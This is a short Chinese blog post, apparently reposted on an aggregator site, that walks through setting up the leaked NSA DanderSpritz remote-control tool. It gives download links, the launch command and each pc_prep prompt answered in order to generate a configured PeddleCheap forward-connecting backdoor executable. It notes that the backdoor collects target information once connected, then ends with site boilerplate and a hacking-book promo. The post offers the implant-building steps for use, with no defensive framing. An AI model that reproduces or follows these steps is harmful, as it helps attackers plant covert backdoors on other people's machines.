前段时间需要一款支持正向连接的远控,试试danderspritz,还不错。
这是NSA泄露的 工具 中的一款远控,类似msf。
https://github.com/3gstudent/fuzzbunch (推荐!避免出现奇奇怪怪的错误)
or
https://github.com/fuzzbunch/fuzzbunch
java -jar start.jar
日志命名格式:C:\logs\xxx!!!!!否则报错
pc_prep
按需求生成后门
这里选25
Pick the payload type
25
Update advanced settings
NO
Listen AT ALL TIMES?
YES
Allow triggering via a raw socket?
YES
Allow fallback to promiscuous mode on that raw socket?
NO
Disable comms between PC and driver?
NO
Allow triggering via port knocking?
NO
Enter the PC ID [0]
0
Change LISTEN PORTS?
NO
– Pick a key
– 0) Exit
– 1) Create a new key
– 2) Default
Enter the desired option
2
– Configuration:
–
–
–
–
–
–
–
–
–
–
Is this configuration valid
YES
Do you want to configure with FC?
NO
– Configured binary at:
– C:\logs\0\z0.0.0.1/Payloads/PeddleCheap_2019_04_25_13h32m34s.934/PC_Level4_exe.configured
正向连接后门
成功连接后会加载模块收集目标信息
help/aliases获取帮助
参考资料
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
- 降低云游戏延迟优化云游戏体验:贝塞斯达推出Orion技术,还公布了免费体验计划
- PyTorch 初体验
- indexedDB 初体验
- golang爬虫初体验
- Netty 入门初体验
- Ansible初体验
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
黑客大曝光
Joel Scambray、Vincent Liu、Caleb Sima / 姚军 / 机械工业出版社华章公司 / 2011-10 / 65.00元
在网络技术和电子商务飞速发展的今天,Web应用安全面临着前所未有的挑战。所有安全技术人员有必要掌握当今黑客们的武器和思维过程,保护Web应用免遭恶意攻击。本书由美国公认的安全专家和精神领袖打造,对上一版做了完全的更新,覆盖新的网络渗透方法和对策,介绍如何增强验证和授权、弥补Firefox和IE中的漏洞、加强对注入攻击的防御以及加固Web 2.0安全,还介绍了如何将安全技术整合在Web开发以及更广泛......一起来看看 《黑客大曝光》 这本书的介绍吧!
